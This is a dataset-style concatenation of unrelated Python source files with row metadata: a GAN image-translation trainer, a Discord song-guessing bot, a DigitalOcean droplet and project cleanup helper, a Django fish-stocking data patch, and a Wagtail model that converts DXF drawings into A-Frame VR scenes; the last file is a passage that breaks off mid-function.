real_A = data["image_A"]
real_B = data["image_B"]
fake_A2B, _, fake_A2B_heatmap = self.genA2B(real_A)
fake_B2A, _, fake_B2A_heatmap = self.genB2A(real_B)
fake_A2B2A, _, fake_A2B2A_heatmap = self.genB2A(fake_A2B)
fake_B2A2B, _, fake_B2A2B_heatmap = self.genA2B(fake_B2A)
# Without copying real_A and real_B tensors before feeding them
# into genB2A and genA2B does not work correctly with the GPU backend.
fake_A2A, _, fake_A2A_heatmap = self.genB2A(real_A.copy())
fake_B2B, _, fake_B2B_heatmap = self.genA2B(real_B.copy())
A2B = np.concatenate((A2B, np.concatenate((RGB2BGR(tensor2numpy(denorm(real_A[0]))),
cam(tensor2numpy(fake_A2A_heatmap[0]), self.img_size),
RGB2BGR(tensor2numpy(denorm(fake_A2A[0]))),
cam(tensor2numpy(fake_A2B_heatmap[0]), self.img_size),
RGB2BGR(tensor2numpy(denorm(fake_A2B[0]))),
cam(tensor2numpy(fake_A2B2A_heatmap[0]), self.img_size),
RGB2BGR(tensor2numpy(denorm(fake_A2B2A[0])))), 0)), 1)
B2A = np.concatenate((B2A, np.concatenate((RGB2BGR(tensor2numpy(denorm(real_B[0]))),
cam(tensor2numpy(fake_B2B_heatmap[0]), self.img_size),
RGB2BGR(tensor2numpy(denorm(fake_B2B[0]))),
cam(tensor2numpy(fake_B2A_heatmap[0]), self.img_size),
RGB2BGR(tensor2numpy(denorm(fake_B2A[0]))),
cam(tensor2numpy(fake_B2A2B_heatmap[0]), self.img_size),
RGB2BGR(tensor2numpy(denorm(fake_B2A2B[0])))), 0)), 1)
cv2.imwrite(os.path.join(self.output_path, self.dataset, 'img', 'A2B_%07d.png' % epoch), A2B * 255.0)
cv2.imwrite(os.path.join(self.output_path, self.dataset, 'img', 'B2A_%07d.png' % epoch), B2A * 255.0)
def save(self, savedir, epoch):
save_checkpoint(self.genA2B, os.path.join(savedir, self.dataset + '_genA2B_params_%07d.ckpt' % epoch))
save_checkpoint(self.genB2A, os.path.join(savedir, self.dataset + '_genB2A_params_%07d.ckpt' % epoch))
save_checkpoint(self.disGA, os.path.join(savedir, self.dataset + '_disGA_params_%07d.ckpt' % epoch))
save_checkpoint(self.disGB, os.path.join(savedir, self.dataset + '_disGB_params_%07d.ckpt' % epoch))
save_checkpoint(self.disLA, os.path.join(savedir, self.dataset + '_disLA_params_%07d.ckpt' % epoch))
save_checkpoint(self.disLB, os.path.join(savedir, self.dataset + '_disLB_params_%07d.ckpt' % epoch))
def load(self, loaddir, epoch):
"""load checkpoint"""
genA2B_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_genA2B_params_%07d.ckpt' % epoch))
not_load = {}
not_load['genA2B'] = load_param_into_net(self.genA2B, genA2B_params)
if self.mode == 'train':
genB2A_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_genB2A_params_%07d.ckpt' % epoch))
disGA_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disGA_params_%07d.ckpt' % epoch))
disGB_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disGB_params_%07d.ckpt' % epoch))
disLA_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disLA_params_%07d.ckpt' % epoch))
disLB_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disLB_params_%07d.ckpt' % epoch))
not_load['genB2A'] = load_param_into_net(self.genB2A, genB2A_params)
not_load['disGA'] = load_param_into_net(self.disGA, disGA_params)
not_load['disGB'] = load_param_into_net(self.disGB, disGB_params)
not_load['disLA'] = load_param_into_net(self.disLA, disLA_params)
not_load['disLB'] = load_param_into_net(self.disLB, disLB_params)
print("these params are not loaded: ", not_load)
def test(self, inception_ckpt_path=None):
"""test"""
self.genA2B.set_train(True)
output_path = os.path.join(self.output_path, self.dataset)
model_list = glob(os.path.join(output_path, 'model', '*.ckpt'))
if model_list:
model_list.sort()
start_epoch = int(model_list[-1].split('_')[-1].split('.')[0])
self.load(os.path.join(output_path, 'model'), start_epoch)
print(" [*] epoch %d Load SUCCESS" % start_epoch)
else:
print(" [*] Load FAILURE")
return
for n, data in enumerate(self.test_iterator):
real_A = data['image_A']
fake_A2B, _, _ = self.genA2B(real_A)
A = RGB2BGR(tensor2numpy(denorm(real_A[0])))
A2B = RGB2BGR(tensor2numpy(denorm(fake_A2B[0])))
cv2.imwrite(os.path.join(output_path, 'test', 'A_%d.png' % (n + 1)), A * 255.0)
cv2.imwrite(os.path.join(output_path, 'test', 'A2B_%d.png' % (n + 1)), A2B * 255.0)
if inception_ckpt_path is not None:
dataset_path = os.path.join(self.data_path, self.dataset)
mean_kernel_inception_distance(output_path, dataset_path, inception_ckpt_path)
| 48.932203 | 117 | 0.539562 | 18,863 | 0.933396 | 0 | 0 | 0 | 0 | 0 | 0 | 2,954 | 0.146172 |
35041a09e77bfa96a1dd1889fc42808e359d1076 | 4,863 | py | Python | bot/cogs/music.py | Nemika-Haj/Guess-The-Song | b206e5667fdc5302f2ca87caa3a59f4b4c126077 | [
"MIT"
] | 1 | 2021-03-03T18:26:53.000Z | 2021-03-03T18:26:53.000Z | bot/cogs/music.py | Nemika-Haj/Guess-The-Song | b206e5667fdc5302f2ca87caa3a59f4b4c126077 | [
"MIT"
] | null | null | null | bot/cogs/music.py | Nemika-Haj/Guess-The-Song | b206e5667fdc5302f2ca87caa3a59f4b4c126077 | [
"MIT"
] | null | null | null | import discord, youtube_dl, asyncio, json, random, os
from youtube_search import YoutubeSearch
from core import checks, embeds, files, database
from discord.ext import tasks
from difflib import SequenceMatcher
commands = discord.ext.commands
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': False,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
class YTDLSource(discord.PCMVolumeTransformer):
def __init__(self, source, *, data, volume=0.5):
super().__init__(source, volume)
self.data = data
self.title = data.get('title')
self.url = data.get('url')
@classmethod
async def from_url(cls, url, *, loop=None):
loop = loop or asyncio.get_event_loop()
data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=False))
if 'entries' in data:
# take first item from a playlist
data = data['entries'][0]
filename = data['url']
return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options), data=data)
class Music(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.playing = []
def similar(self, s_1, s_2): return SequenceMatcher(None, s_1, s_2).ratio() > 0.6
@commands.guild_only()
@commands.command()
async def play(self, ctx, *, category="random"):
if not ctx.author.voice: return
if ctx.author.voice in self.playing: return await ctx.send(embed=embeds.Embeds("Already playing!").error())
categories = [i[:-5] for i in os.listdir("data") if i.endswith(".json")]
if not category.lower() in categories: return await ctx.send(embed=embeds.Embeds("There's no such category! The available categories are; " + ','.join(f"`{i}`" for i in categories)).error())
if ctx.voice_client.is_playing():
ctx.voice_client.stop()
song = random.choice(files.Data(category).json_read())
player = await YTDLSource.from_url(song, loop=self.bot.loop)
title = player.title.lower()
ctx.voice_client.play(player)
await ctx.send(embed=discord.Embed(
title="Guess The Song!",
description=f"Now playing track! Try to guess the song before it's over!\n*`Mode: {category}`*",
color=discord.Color.green()
))
self.playing.append(ctx.author.voice)
try:
answer = await self.bot.wait_for(
"message",
timeout=player.data['duration'],
check=lambda message: self.similar(message.content.lower(), title) or (message.content.lower() == "forcestop" and message.author.id == ctx.author.id)
)
except asyncio.TimeoutError:
self.playing.remove(ctx.author.voice)
await ctx.voice_client.disconnect()
return await ctx.send(embed=discord.Embed(
title="Song is over!",
description=f"Nobody guessed the song! It was `{player.title}`!",
color=discord.Color.red(),
url=player.data['webpage_url']
)
.set_thumbnail(url=player.data['thumbnail']))
if answer.content.lower() == "forcestop":
self.playing.remove(ctx.author.voice)
await ctx.voice_client.disconnect()
return await ctx.send(embed=discord.Embed(
title="Force Stop!",
description=f"The song was force stopped! It was `{player.title}`!",
color=discord.Color.red(),
url=player.data['webpage_url']
)
.set_thumbnail(url=player.data['thumbnail']))
database.Levels(answer.author.id).add_xp()
self.playing.remove(ctx.author.voice)
return await ctx.send(embed=discord.Embed(
title="Congratulations!",
description=f"{answer.author.mention} guessed the song! It was `{player.title}`!",
color=discord.Color.green(),
url=player.data['webpage_url']
)
.set_thumbnail(url=player.data['thumbnail']))
@play.before_invoke
async def ensure_voice(self, ctx):
if not ctx.voice_client:
if not ctx.author.voice:
return await ctx.send(embed=embeds.Embeds("You must be connected in a voice channel!").error())
else:
await ctx.author.voice.channel.connect()
def setup(bot):
bot.add_cog(Music(bot)) | 34.735714 | 198 | 0.61094 | 4,051 | 0.833025 | 0 | 0 | 3,596 | 0.739461 | 3,504 | 0.720543 | 944 | 0.194119 |
3505b0795f024d936847202220a08964b18c6216 | 573 | py | Python | tests/argparse/special/modules/defaults/__init__.py | da-h/miniflask | d5e594153cca4ce4d30db01b1d06d05afa9e7aaa | [
"MIT"
] | 5 | 2020-02-17T12:14:36.000Z | 2020-02-27T12:09:05.000Z | tests/argparse/special/modules/defaults2/__init__.py | da-h/miniflask | d5e594153cca4ce4d30db01b1d06d05afa9e7aaa | [
"MIT"
] | 69 | 2020-04-03T08:16:35.000Z | 2021-12-21T15:46:29.000Z | tests/argparse/special/modules/defaults2/__init__.py | da-h/miniflask | d5e594153cca4ce4d30db01b1d06d05afa9e7aaa | [
"MIT"
] | 1 | 2020-04-02T15:46:39.000Z | 2020-04-02T15:46:39.000Z |
def printVal(state, name):
val = state[name]
print("%s:" % state.fuzzy_names[name], val)
def print_all(state):
printVal(state, "var_default")
printVal(state, "var_default_override")
printVal(state, "var_default_override_twice")
printVal(state, "var_default_override_twice_and_cli")
def register(mf):
mf.register_defaults({
"var_default": 1,
"var_default_override": 2,
"var_default_override_twice": 3,
"var_default_override_twice_and_cli": 4
})
mf.register_event('print_all', print_all, unique=False)
| 26.045455 | 59 | 0.685864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 214 | 0.373473 |
35062f45b2371121df6f139d2c546ce0211006a8 | 867 | py | Python | Resene naloge/euler35.py | CadezDavid/ProjectEuler | 9e11aa5782fb600c98eba9e04766b3bd79acea0e | [
"MIT"
] | null | null | null | Resene naloge/euler35.py | CadezDavid/ProjectEuler | 9e11aa5782fb600c98eba9e04766b3bd79acea0e | [
"MIT"
] | null | null | null | Resene naloge/euler35.py | CadezDavid/ProjectEuler | 9e11aa5782fb600c98eba9e04766b3bd79acea0e | [
"MIT"
] | null | null | null | import itertools
stevke = ['1', '3', '7', '9']
def je_prastevilo(n):
if n < 2 or n % 2 == 0:
return n == 2
i = 3
while i * i <= n:
if n % i == 0 or n % 2 == 0:
return False
i += 2
return True
def zasukej(nabor):
stevilo = list(nabor)
seznam = []
while len(seznam) < len(stevilo):
seznam.append(int(''.join(stevilo)))
stevilo.insert(0, stevilo.pop())
return seznam
circular_primes = []
for ponavljanje in range(1, 7):
for stevilo in itertools.product(stevke, repeat=ponavljanje):
if all(je_prastevilo(permutacija) for permutacija in zasukej(stevilo)):
circular_primes += zasukej(stevilo)
for stevilo in range(10):
if je_prastevilo(stevilo):
circular_primes.append(stevilo)
print(sorted(list(set(circular_primes))), len(set(circular_primes))) | 25.5 | 79 | 0.605536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.016148 |
3506323d7b6298be2f53323222f210a843ce3b94 | 6,650 | py | Python | utils/update_ontario_huron_stocking.py | AdamCottrill/fsdivz | 98dd1f35a08dba26424e2951a40715e01399478c | [
"MIT"
] | null | null | null | utils/update_ontario_huron_stocking.py | AdamCottrill/fsdivz | 98dd1f35a08dba26424e2951a40715e01399478c | [
"MIT"
] | 6 | 2020-02-12T00:03:40.000Z | 2020-11-30T01:20:56.000Z | utils/update_ontario_huron_stocking.py | AdamCottrill/fsdviz | 98dd1f35a08dba26424e2951a40715e01399478c | [
"MIT"
] | null | null | null | """
~/utils/update_ontario_stocking.py
Created: 23 Jan 2019 15:29:22
DESCRIPTION:
This script updates the ontario data in the lake wide cwt database.
Updates include tag type, and sequence number for sequential cwts, cwt
manufacturer (where it should have been Micro Mark (MM))
Updates are preformed on both stocking (below) and recovery (NOT YET)
tables.
This script should be run after the lakewide database has been
built and populated with both US and ontario data.
A. Cottrill
=============================================================
"""
import csv
import re
from collections import namedtuple
from fsdviz.common.models import CWT, CWTsequence
from fsdviz.stocking.models import StockingEvent
# ======================================================
# FSIS_ID to ID
# to update the OMNR stocking data, we need a dictionary that maps
# the ontario id values (fs_event) to the StockingEvent.Id in the
# current database
# get the id numbers and notes for each lake huron ontario stocking event
ont_events = StockingEvent.objects.filter(
agency__abbrev="OMNR", jurisdiction__lake__abbrev="HU"
)
# ontario fs_event numbers are in the notes field as 'fs_event:
# <fsis_id>' this code extracts the fsis_id from the notes and pairs
# it with its corresponding id in the current lakewide database.
# returns a list of tuples of the form: (<fsis_id>, <id>)
# id_pairs = [(int(re.match('fs_event: (\d+)',x['notes']).groups()[0]), x['id'])
# for x in ont_events]
# create a dictionary with the fsis_id as key - makes it easy to get
# associated id for the lakewide db:
fsis2lwdb = {x.agency_stock_id: x.id for x in ont_events}
# ======================================================
# STOCKED SEQUENTIAL CWTS
print("Updating Ontario's Sequential tags...")
# the csv file "MNRF_stocking_events_sequential_cwts.csv" contains a
# list of stocking events associated with sequential csv and the start
# and end the range associated with that event.
# create a named tuple that will hold our stocking event info:
seqCWT = namedtuple("seqCWT", "fsis_event, cwt_number, seq_start, seq_end")
fname = "utils/patches/MNRF_stocking_events_sequential_cwts.csv"
with open(fname) as csvfile:
reader = csv.reader(csvfile)
next(reader, None) # skip header
seqcwt_events = [seqCWT(*x) for x in reader]
for x in seqcwt_events[:3]:
print(x)
# make sure that all of the cwts are in the database - and that Lake
# Huron is the only lake and agency to stock that those tags.
cwt_numbers = list({x.cwt_number for x in seqcwt_events})
for event in seqcwt_events:
cwt = CWT.objects.filter(cwt_number=event.cwt_number).first()
if cwt is None:
print(event)
# now loop over the sequential cwt events and find the associated cwt
# and cwt_sequences in our database. Update the cwt start, end and tag
# type for each one. Keep a list of errors and print them out if
# anything goes wrong.
oops = []
for event in seqcwt_events:
cwt = CWT.objects.filter(cwt_number=event.cwt_number).first()
if cwt is None:
print(event)
oops.append(event)
continue
lwdb_id = fsis2lwdb[event.fsis_event]
stocking_event = StockingEvent.objects.get(id=lwdb_id)
cwt_seq, created = CWTsequence.objects.get_or_create(
cwt=cwt, sequence=(int(event.seq_start), int(event.seq_end))
)
cwt_seq.events.add(stocking_event)
cwt.tag_type = "sequential"
cwt.save()
# delete any cwtsequence events that are associated with sequential
# tags, but the sequence range is 0,0 (this was the old placeholder)
if oops:
print("There were problems with the following sequential tag records:")
for x in oops:
print(x)
# make sure that there aren't any stocking events associated with
# sequential cwts series that end with 1 - they should have all been
# fixed in the last step.
oops = StockingEvent.objects.filter(
cwt_series__seq_end=1, cwt_series__cwt__tag_type="sequental"
)
assert len(oops) == 0
# delete all of cwt series associated with seqential tags that start
# and end with 1 - these were created when the cwt was added but no
# longer point to any stocking events
childless_cwts = CWTsequence.objects.filter(
cwt__tag_type="sequential", sequence__isnull=True
)
childless_cwts.delete()
foo = CWTsequence.objects.filter(sequence__isnull=True)
#
# ======================================================
# CWT MANUFACTURER
print("Updating MicroMark tags...")
# this query returs a list of cwt numbers (without dashes) that we
# know were manufactured by Micro Mark. Only cwt numbers that are
# unique were to micro mark are included (63-59-01, 63-41-04,
# 63-43-04, 63-56-03 were manufactured by both MM and NMT and must be
# handled seperately (below))
fname = "utils/patches/MNRF_MicroMark_cwts.csv"
with open(fname) as csvfile:
reader = csv.reader(csvfile)
next(reader, None) # skip header
mm_cwts = [x[0] for x in reader]
omnr = Agency.objects.get(abbrev="OMNR")
for cwt_num in mm_cwts:
qs = CWT.objects.filter(
cwt_number=cwt_num, cwt_series__events__agency=omnr
).distinct()
assert len(qs) == 1
cwt = qs[0]
cwt.manufacturer = "mm"
cwt.save()
# these are the cwt number that have been purchased from two
# vendors. The event numbers are the stocking event IDs that used the
# Micro Mark tags.
micromark_events = {
# chinook stocked by ssa in 2001 - Not in FSIS Yet!
# "634104": [],
# chinook stocked by ssa in 2001 - Not in FSIS Yet!
# "634304": [],
"635603": [2650],
"635901": [2379, 2928],
}
# now loop over cwt numbers that have been purchased from 2
# manufacturers and get the events associated with each one create a
# new CWT object and new cwt_sequence. FInally, get the original
# stocking event and assign it to the sequence object created above.
for cwt_num, event_nums in micromark_events.items():
print("Applying updates for both {} tags...".format(cwt_num))
cwt_obj, created = CWT.objects.get_or_create(
cwt_number=cwt_num, tag_type="cwt", tag_count=0, manufacturer="mm"
)
cwt_seq, created = CWTsequence.objects.get_or_create(cwt=cwt_obj, sequence=(0, 1))
if event_nums:
for fsis_id in event_nums:
lwdb_id = fsis2lwdb.get(str(fsis_id))
if lwdb_id:
event = StockingEvent.objects.get(id=lwdb_id)
event.cwt_series.clear()
cwt_seq.events.add(event)
else:
print("/t unable for find FSIS event: {}".format(fsis_id))
print("Done updating Ontario-Huron tags.")
| 30.930233 | 86 | 0.689474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,900 | 0.586466 |
3507ca02ee239037d5eef8f695a0bc5d29d25160 | 2,001 | py | Python | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | from PIL import Image
import numpy as np
from matplotlib.path import Path
import matplotlib.pyplot as plt
import matplotlib.patches as patches
image = Image.open('samp3.png', 'r') #read image
image = image.convert('L') #convert image to greyscale
data = np.asarray(image) #convert image to numpy array
n_rows = len(data)
n_columns = len(data[0])
point = []
#-------------------------- * Draw Point *-------------------------
def drawCircle(x,y):
global ax
circle = patches.Circle((x,y), 2, lw=1, ls='-', fill=True, color='red')
ax.add_patch(circle)
plt.draw()
return ax
#-------------------------- * Draw Polygon and calculate average of pixel values *------
def drawPolygon(p):
global point
line = patches.Polygon(point, lw=1, ls='-', fill=False, color='red')
ax.add_line(line)
plt.draw()
p = Path(point)
total = 0
n = 0
for i in range(0,n_rows):
for j in range(0, n_columns):
if(p.contains_point([i,j])):
total += data[i][j]
n += 1
print("Average pixel values in the Polygon = "+ str(total/n))
#----------------------------- * On click event * --------------------------
def onclick(event):
global xc, yc
global ax, patches
global point
x, y = event.xdata, event.ydata
#stop listening if user click on top left corner
if event.dblclick:
drawPolygon(point)
fig.canvas.mpl_disconnect(cid)
#print("stoped listening for events")
else:
point.append([x,y])
print 'added vertice : (%d,%d)' %(x, y)
drawCircle(x,y)
return point
#-------------------------------------------------------------------------
fig,ax = plt.subplots(1)
ax.imshow(data, cmap='gray')
cid = fig.canvas.mpl_connect('button_press_event', onclick)
print("start listening for mouse clicks ... click on top left corner to stop listening")
plt.show()
plt.draw() | 27.791667 | 88 | 0.541229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 662 | 0.330835 |
350b9abb1ca4e2974d32cb349bf6a2ec364bd5f2 | 2,425 | py | Python | digital_ocean.py | Nahid5/digitalOceanHelper | 6250ca4969d3d2bc402054d1ea240a3e1743341d | [
"Apache-2.0"
] | null | null | null | digital_ocean.py | Nahid5/digitalOceanHelper | 6250ca4969d3d2bc402054d1ea240a3e1743341d | [
"Apache-2.0"
] | null | null | null | digital_ocean.py | Nahid5/digitalOceanHelper | 6250ca4969d3d2bc402054d1ea240a3e1743341d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import requests
import json
#Enter DO token
DOTOKEN = ""
HEADERS = {"Authorization": "Bearer " + DOTOKEN, "Content-Type": "application/json"}
##################################################################################
# Droplets
#
##################################################################################
def get_current_droplet_count():
'''
Returns the number of droplets currently created and total drolet limit
Return: [CURRENT DROPLET NUMBERS, MAX ACCOUNT CAN MAKE]
'''
r2 = requests.get("https://api.digitalocean.com/v2/account", headers=headers)
jsonData2 = json.loads(r2.text)
return[str(jsonData["meta"]["total"]), str(jsonData2["account"]["volume_limit"])]
def get_all_droplets():
'''
'''
r = requests.get("https://api.digitalocean.com/v2/droplets?page=1&per_page=1000", headers=HEADERS)
jsonData = json.loads(r.text)
# Get All Droplets and tags
for droplet in jsonData["droplets"]:
#print(droplet)
print(str(droplet["id"]) + ": " +str(droplet["name"]) + " " + str(droplet["created_at"]) + " " + str(droplet["tags"]))
def delete_droplet_by_id(id):
'''
'''
r = requests.delete("https://api.digitalocean.com/v2/droplets/" + id, headers=HEADERS)
print(r.status_code)
##################################################################################
# Projects
#
##################################################################################
def get_all_projects():
'''
'''
r = requests.get("https://api.digitalocean.com/v2/projects", headers=HEADERS)
jsonData = json.loads(r.text)
#rint(jsonData)
for project in jsonData["projects"]:
if(is_project_empty(project["id"])):
#print(project["name"] + " is empty")
delete_project_by_id(project["id"])
def is_project_empty(id):
'''
'''
r = requests.get("https://api.digitalocean.com/v2/projects/" + id + "/resources", headers=HEADERS)
jsonData = json.loads(r.text)
#print(jsonData)
if(jsonData["meta"]["total"] == 0):
return True
return False
def delete_project_by_id(id):
'''
'''
r = requests.delete("https://api.digitalocean.com/v2/projects/" + id, headers=HEADERS)
#jsonData = json.loads()
#print(r.status_code)
if(__name__ == "__main__"):
get_all_projects() | 33.219178 | 126 | 0.53567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,274 | 0.525361 |
350be143f1d30bd097d33dfb553998544343e178 | 24,784 | py | Python | models.py | andywar65/dxf2vr | b51f8579b0e84c770f54c9d20b42cfe8d84a9031 | [
"BSD-2-Clause"
] | 3 | 2020-04-20T05:35:19.000Z | 2020-11-04T07:24:55.000Z | models.py | andywar65/dxf2vr | b51f8579b0e84c770f54c9d20b42cfe8d84a9031 | [
"BSD-2-Clause"
] | null | null | null | models.py | andywar65/dxf2vr | b51f8579b0e84c770f54c9d20b42cfe8d84a9031 | [
"BSD-2-Clause"
] | null | null | null | import os
from math import radians, sin, cos, asin, degrees, pi, sqrt, pow, fabs, atan2
from django import forms
from django.db import models
from django.conf import settings
from modelcluster.fields import ParentalKey
from wagtail.wagtailcore.models import Page, Orderable
from wagtail.wagtailadmin.edit_handlers import FieldPanel, InlinePanel, MultiFieldPanel
from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
from wagtail.wagtailsearch import index
from wagtail.wagtaildocs.models import Document
from wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel
class Dxf2VrPage(Page):
intro = models.CharField(max_length=250, null=True, blank=True,)
equirectangular_image = models.ForeignKey(
'wagtailimages.Image',
null=True,
blank=True,
on_delete = models.SET_NULL,
related_name = '+',
)
dxf_file = models.ForeignKey(
'wagtaildocs.Document',
null=True,
on_delete = models.SET_NULL,
related_name = '+',
)
shadows = models.BooleanField(default=False)
fly_camera = models.BooleanField(default=False)
double_face = models.BooleanField(default=False)
search_fields = Page.search_fields + [
index.SearchField('intro'),
#index.SearchField('body'),
]
content_panels = Page.content_panels + [
FieldPanel('intro'),
DocumentChooserPanel('dxf_file'),
ImageChooserPanel('equirectangular_image'),
MultiFieldPanel([
FieldPanel('shadows'),
FieldPanel('fly_camera'),
FieldPanel('double_face'),
], heading="Visual settings"),
InlinePanel('material_images', label="Material Image Gallery",),
]
def extract_dxf(self):
path_to_dxf = os.path.join(settings.MEDIA_ROOT, 'documents', self.dxf_file.filename)
dxf_f = open(path_to_dxf, encoding = 'utf-8')
material_gallery=self.material_images.all()
output = {}
flag = False
x = 0
value = 'dummy'
while value !='ENTITIES':
key = dxf_f.readline().strip()
value = dxf_f.readline().strip()
while value !='ENDSEC':
key = dxf_f.readline().strip()
value = dxf_f.readline().strip()
if flag == 'face':#stores values for 3D faces
if key == '8':#layer name
temp[key] = value
elif key == '10' or key == '11' or key == '12' or key == '13':#X position
temp[key] = value
elif key == '20' or key == '21' or key == '22' or key == '23':#mirror Y position
value = -float(value)
temp[key] = value
elif key == '30' or key == '31' or key == '32' or key == '33':#Z position
temp[key] = value
elif flag == 'block':#stores values for blocks
if key == '2' or key == '8':#block name and layer name
temp[key] = value
elif key == '10' or key == '30':#X Z position
temp[key] = value
elif key == '20':#Y position, mirrored
temp[key] = -float(value)
elif key == '50':#Z rotation
temp[key] = value
elif key == '41' or key == '42' or key == '43':#scale values
temp[key] = value
elif key == '210':#X of OCS unitary vector
Az_1 = float(value)
P_x = float(temp['10'])
elif key == '220':#Y of OCS unitary vector
Az_2 = float(value)
P_y = -float(temp['20'])#reset original value
elif key == '230':#Z of OCS unitary vector
Az_3 = float(value)
P_z = float(temp['30'])
#arbitrary axis algorithm
#see if OCS z vector is close to world Z axis
if fabs(Az_1) < (1/64) and fabs(Az_2) < (1/64):
W = ('Y', 0, 1, 0)
else:
W = ('Z', 0, 0, 1)
#cross product for OCS x arbitrary vector, normalized
Ax_1 = W[2]*Az_3-W[3]*Az_2
Ax_2 = W[3]*Az_1-W[1]*Az_3
Ax_3 = W[1]*Az_2-W[2]*Az_1
Norm = sqrt(pow(Ax_1, 2)+pow(Ax_2, 2)+pow(Ax_3, 2))
Ax_1 = Ax_1/Norm
Ax_2 = Ax_2/Norm
Ax_3 = Ax_3/Norm
#cross product for OCS y arbitrary vector, normalized
Ay_1 = Az_2*Ax_3-Az_3*Ax_2
Ay_2 = Az_3*Ax_1-Az_1*Ax_3
Ay_3 = Az_1*Ax_2-Az_2*Ax_1
Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2))
Ay_1 = Ay_1/Norm
Ay_2 = Ay_2/Norm
Ay_3 = Ay_3/Norm
#insertion world coordinates from OCS
temp['10'] = P_x*Ax_1+P_y*Ay_1+P_z*Az_1
temp['20'] = P_x*Ax_2+P_y*Ay_2+P_z*Az_2
temp['30'] = P_x*Ax_3+P_y*Ay_3+P_z*Az_3
#OCS X vector translated into WCS
Ax_1 = ((P_x+cos(radians(float(temp['50']))))*Ax_1+(P_y+sin(radians(float(temp['50']))))*Ay_1+P_z*Az_1)-temp['10']
Ax_2 = ((P_x+cos(radians(float(temp['50']))))*Ax_2+(P_y+sin(radians(float(temp['50']))))*Ay_2+P_z*Az_2)-temp['20']
Ax_3 = ((P_x+cos(radians(float(temp['50']))))*Ax_3+(P_y+sin(radians(float(temp['50']))))*Ay_3+P_z*Az_3)-temp['30']
#cross product for OCS y vector, normalized
Ay_1 = Az_2*Ax_3-Az_3*Ax_2
Ay_2 = Az_3*Ax_1-Az_1*Ax_3
Ay_3 = Az_1*Ax_2-Az_2*Ax_1
Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2))
Ay_1 = Ay_1/Norm
Ay_2 = Ay_2/Norm
Ay_3 = Ay_3/Norm
#A-Frame rotation order is Yaw(Z), Pitch(X) and Roll(Y)
#thanks for help Marilena Vendittelli and https://www.geometrictools.com/
if Ay_3<1:
if Ay_3>-1:
pitch = asin(Ay_3)
yaw = atan2(-Ay_1, Ay_2)
roll = atan2(-Ax_3, Az_3)
else:
pitch = -pi/2
yaw = -atan2(Az_1, Ax_1)
roll = 0
else:
pitch = pi/2
yaw = atan2(Az_1, Ax_1)
roll = 0
#Y position, mirrored
temp['20'] = -temp['20']
#rotations from radians to degrees
temp['210'] = degrees(pitch)
temp['50'] = degrees(yaw)
temp['220'] = -degrees(roll)
elif flag == 'attrib':#stores values for attributes within block
if key == '1':#attribute value
attr_value = value
elif key == '2':#attribute key
temp[value] = attr_value
flag = 'block'#restore block modality
if key == '0':
if flag == 'face':#close 3D face
#is material set in model?
no_color=True
if material_gallery:
for material in material_gallery:
if material.layer == temp['8']:
no_color=False
temp['color'] = material.color
if no_color:#color is still not set for layer, so we use default
temp['8'] = 'default'
temp['color'] = 'white'
output[x] = self.make_triangle_1(x, temp)
if temp['12']!=temp['13'] or temp['22']!=temp['23'] or temp['32']!=temp['33']:
x += 1
output[x] = self.make_triangle_2(x, temp)
flag = False
elif value == 'ATTRIB':#start attribute within block
attr_value = ''
flag = 'attrib'
elif flag == 'block':#close block
#material images are patterns? is material set in model?
no_color=True
if material_gallery:
for material in material_gallery:
if material.layer == temp['8']:
no_color=False
temp['color'] = material.color
if material.pattern:# == True
temp['repeat']=True
if no_color:#color is still not set for layer, so we use default
temp['8'] = 'default'
temp['color'] = 'white'
if temp['2'] == '6planes':#left for legacy
output[x] = self.make_box(x, temp)
elif temp['2'] == 'box' or temp['2'] == 'a-box':
output[x] = self.make_box(x, temp)
elif temp['2'] == 'cylinder' or temp['2'] == 'a-cylinder':
output[x] = self.make_cylinder(x, temp)
elif temp['2'] == 'cone' or temp['2'] == 'a-cone':
output[x] = self.make_cone(x, temp)
elif temp['2'] == 'sphere' or temp['2'] == 'a-sphere':
output[x] = self.make_sphere(x, temp)
elif temp['2'] == 'circle' or temp['2'] == 'a-circle':
output[x] = self.make_circle(x, temp)
elif temp['2'] == 'plane' or temp['2'] == 'a-plane' or temp['2'] == 'look-at':
output[x] = self.make_plane(x, temp)
elif temp['2'] == 'floor':#left for legacy
temp['210'] = float(temp['210']) - 90
output[x] = self.make_plane(x, temp)
elif temp['2'] == 'ceiling':#left for legacy
temp['210'] = float(temp['210']) + 90
output[x] = self.make_plane(x, temp)
elif temp['2'] == 'light' or temp['2'] == 'a-light':
